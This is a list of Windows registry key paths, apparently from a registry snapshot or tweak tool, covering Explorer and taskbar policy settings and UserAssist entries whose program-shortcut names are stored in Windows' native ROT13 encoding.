HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTaskGrouping
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarGlomLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSmallIcons
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSmallIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisablePreviewDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisablePreviewDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\au\NoAUShutdownOption
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\au\NoAUAsDefaultShutdownOption
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_PowerButtonAction
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_PowerButtonAction
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SortOrderIndex
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong Ernqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax
